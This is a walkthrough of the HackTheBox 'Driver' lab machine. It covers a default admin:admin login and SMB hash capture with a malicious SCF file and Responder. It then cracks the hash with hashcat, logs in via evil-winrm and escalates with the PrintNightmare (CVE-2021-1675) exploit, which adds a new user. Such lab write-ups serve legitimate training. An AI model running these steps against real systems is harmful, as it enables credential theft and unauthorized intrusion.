In this post, I would like to share a walkthrough of the Driver Machine from HackTheBox


This room has been considered difficulty rated as an Easy machine on HackThebox

Source: HackTheBox

What will you gain from the Driver machine?


For the user flag, you will execute the SMB relay approach to obtain tony’s password


As for the root flag, you need to execute an exploit related to PrintNightMare

Information Gathering


Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 


Let’s try to access the website interface


We are required to key in the username and password to login to the Dashboard. My assumption of the credentials would be admin:admin


## Surely people are thinking about how I get the username admin? If you look carefully, there’s wording such as “Please enter a password for admin” ##


Finally, we managed to login into the Dashboard.

Gaining the Privileges Access


On the menu bar, there’s nothing that can be used except the Firmware Updates function which leads to a page that requires us to update the printer’s firmware.


From the result, I notice there’s a lot of Metasploit methods which I try to avoid using it. However, we managed to sight a website that guide us to exploit the machine without using Metasploit.

Source: SMB Relay – Penetration Testing Lab (pentestlab.blog)

As a result, we will need to create a file under the SCF format that is shown in the screenshot above.


The only modification needed would be \\<Your IP Address>\share\<anyname>.ico


Let’s run the tools Responder by using “sudo responder -wrf –lm -v -I tun0” which the tool stops at “Listening for the event


Once the responder has been started, we can finally attach the SCF file format to the website and click “Submit


After a while, we have been provided with a lot of NTLMv2 hash which only assigned to tony


Let’s save the first hashes into a file and try to obtain the password from it using hashcat command such as “hashcat -m 5600 -a o <hash file> /<your file location that stored the rockyou>/rockyou.txt


Finally, we have the password for tony which liltony.


Let’s try to login the machine via an evil-winrm tool which requires the command like evil-winrm -i 10.10.11.106 -u tony -p liltony


We can read the user flag by executing the command “type C:\Users\tony\Desktop\user.txt

Escalate to Admin Privileges on Driver Machine

PrintNightMare Vulnerability


At last, I can test the PrintNightMare Vulnerability on HTB Machine.


For those who are not familiar with the PrintNightMare exploit, you can google it on the internet.


Firstly, you need to download the PrintNightMare exploit by running the command “git clone https://github.com/calebstewart/CVE-2021-1675” on your own machine.


After that, we can upload the CVE-2021-1675.ps1 into the HTB’s machine.


Next, we can use the command “Import-Module .\CVE-2021-1675.ps1


Finally, we can create a new username and password by using the Invoke-Nightmare -NewUser “anything” -NewPassword “anything”


As a result, we can login the machine using the credentials that we created earlier.


We should be able to obtain the root flag by executing “type C:\Users\administrator\Desktop\root.txt

Additional Information


In case we found an error when trying to import the module of the ps1 file on the HTB’s machine, we can try to download the file into the machine using the IEX command shown below: